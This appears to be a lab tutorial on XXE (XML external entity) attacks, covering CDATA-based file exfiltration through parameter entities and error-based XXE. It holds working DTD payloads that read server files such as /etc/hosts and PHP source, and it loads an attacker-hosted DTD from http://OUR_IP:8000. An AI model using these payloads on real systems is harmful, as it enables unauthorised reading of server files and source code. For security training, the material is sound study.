Advanced Exfiltration with CDATA

For PHP web apps, we can use PHP filters to encode and read source files.

But what about other types of Web Apps?

To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>).

This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.

<!DOCTYPE email [
  <!ENTITY begin "<![CDATA[">
  <!ENTITY file SYSTEM "file:///var/www/html/submitDetails.php">
  <!ENTITY end "]]>">
  <!ENTITY joined "&begin;&file;&end;">
]>

After that, if we reference the &joined; entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities, so we will have to find a better way to do so.

To bypass this limitation, we can utilize XML Parameter Entities, a special type of entity that starts with a % character and can only be used within the DTD. What’s unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:

<!ENTITY joined "%begin;%file;%end;">

So, let’s try to read the submitDetails.php file by first storing the above line in a DTD file (e.g. xxe.dtd), host it on our machine, and then reference it as an external entity on the target web application, as follows:

jadu101@htb[/htb]$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
jadu101@htb[/htb]$ python3 -m http.server 8000
 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Now, we can reference our external entity (xxe.dtd) and then print the &joined; entity we defined above, which should contain the content of the submitDetails.php file, as follows:

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
...
<email>&joined;</email> <!-- reference the &joined; entity to print the file content -->

Once we write our xxe.dtd file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the submitDetails.php file: 

php_cdata

Error Based XXE

If the web app is not writing any output, we would be blind to XXE.

If the web application displays runtime errors (e.g., PHP errors) and does not have proper exception handling for the XML input, then we can use this flaw to read the output of the XXE exploit.

Let’s say none of the XML input entity is displayed on the screen.

We first try sending malformed XML data and see if the web app displays any errors.

To do so, we can try deleting any of the closing tags, change one of them, so it does not close (e.g. <roo>).

When doing that, we see an error from the web app, which revealed the web server directory that we can use to read the source code of other files.

Let’s exploit this flaw and read file content.

We will first host a DTD file that contains the following payload:

<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

The above payload defines the file parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity; does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file; as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.

Now, we can call our external DTD script, and then reference the error entity, as follows:

<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %error;
]>

Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the /etc/hosts file as follows: exfil_error

This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"). However, this method is not as reliable as the previous method for reading source files, as it may have length limitations, and certain special characters may still break it.